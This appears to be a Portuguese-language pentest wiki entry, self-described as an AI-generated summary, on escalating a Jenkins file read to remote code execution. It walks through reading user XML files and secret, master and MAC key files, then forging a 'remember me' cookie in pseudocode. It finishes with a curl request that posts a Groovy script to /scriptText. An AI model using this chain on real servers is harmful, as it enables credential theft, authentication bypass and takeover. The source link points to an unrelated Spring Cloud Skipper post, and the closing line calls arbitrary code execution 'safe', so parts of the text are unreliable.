Jenkins Arbitrary File Read to RCE via "Remember Me"

Neste post do blog, é possível encontrar uma ótima maneira de transformar uma vulnerabilidade de Local File Inclusion no Jenkins em RCE: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/

Este é um resumo criado por IA da parte do post onde o craft de um cookie arbitrário é abusado para obter RCE abusando de uma leitura de arquivo local até que eu tenha tempo para criar um resumo por conta própria:

Attack Prerequisites

• Feature Requirement: "Lembre-se de mim" deve estar habilitado (configuração padrão).

• Access Levels: O atacante precisa de permissões Overall/Read.

• Secret Access: Capacidade de ler tanto conteúdo binário quanto textual de arquivos-chave.

Detailed Exploitation Process

Step 1: Data Collection

User Information Retrieval

• Acesse a configuração do usuário e segredos de $JENKINS_HOME/users/*.xml para cada usuário para coletar:

• Nome de usuário

• Semente do usuário

• Timestamp

• Hash da senha

Secret Key Extraction

• Extraia chaves criptográficas usadas para assinar o cookie:

• Chave Secreta: $JENKINS_HOME/secret.key

• Chave Mestra: $JENKINS_HOME/secrets/master.key

• Arquivo de Chave MAC: $JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac

Step 2: Cookie Forging

Token Preparation

• Calcule o Tempo de Expiração do Token:

tokenExpiryTime = currentServerTimeInMillis() + 3600000  // Adiciona uma hora ao tempo atual

• Concatene os Dados para o Token:

token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey

MAC Key Decryption

• Descriptografe o Arquivo de Chave MAC:

key = toAes128Key(masterKey)  // Converte a chave mestra para o formato de chave AES128
decrypted = AES.decrypt(macFile, key)  // Descriptografa o arquivo .mac
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")

Signature Computation

• Calcule HMAC SHA256:

mac = HmacSHA256(token, macKey)  // Calcule HMAC usando o token e a chave MAC
tokenSignature = bytesToHexString(mac)  // Converta o MAC para uma string hexadecimal

Cookie Encoding

• Gere o Cookie Final:

cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature)  // Codifique os dados do cookie em Base64

Step 3: Code Execution

Session Authentication

• Recupere os Tokens CSRF e de Sessão:

• Faça uma solicitação para /crumbIssuer/api/json para obter Jenkins-Crumb.

• Capture JSESSIONID da resposta, que será usado em conjunto com o cookie de lembrete.

Command Execution Request

• Envie uma Solicitação POST com Script Groovy:

curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"

• O script Groovy pode ser usado para executar comandos em nível de sistema ou outras operações dentro do ambiente Jenkins.

O comando curl de exemplo fornecido demonstra como fazer uma solicitação ao Jenkins com os cabeçalhos e cookies necessários para executar código arbitrário de forma segura.